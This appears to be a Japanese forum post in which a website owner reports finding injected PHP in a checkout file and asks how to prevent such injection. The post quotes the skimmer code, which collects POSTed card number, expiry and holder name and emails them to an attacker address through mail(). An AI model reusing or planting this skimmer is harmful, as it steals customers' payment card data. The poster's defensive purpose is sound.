作成した Web サイトのフローを再テストしていたところ、チェックアウト セクションに到達したときに、ページにこれまでに作成したことのないコードがあることに気付きました。それは注射で、私たちは本当に怖かったです。コードはチェックアウト ファイルの 1 つにテキストとして配置されただけで、PHP タグ内にないため実行されませんでしたが、かなり怖かったです。
コードは基本的に、支払い指示の各フィールド (カードの名前、カードの種類、カード番号、cvc、有効期限) を投稿し、mail() php 関数を実行して情報を特定の電子メールに送信するものでした。私はハッカーのメールさえ持っています!!
$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "______@yahoo.fr";
$subject = "cc";
mail($i,$subject,$message);
サイトで PHP インジェクションを回避するにはどうすればよいでしょうか? 私たちの支払いをサポートしている Stripe に連絡して、API が十分に安全かどうかを確認しました。それはそうですね。しかし、このようなインジェクションによって、郵送情報やその他の支払いに関連しない情報が簡単にハッキングされる可能性があります。ファイルへのインジェクションを回避するにはどうすればよいでしょうか?
ありがとう!!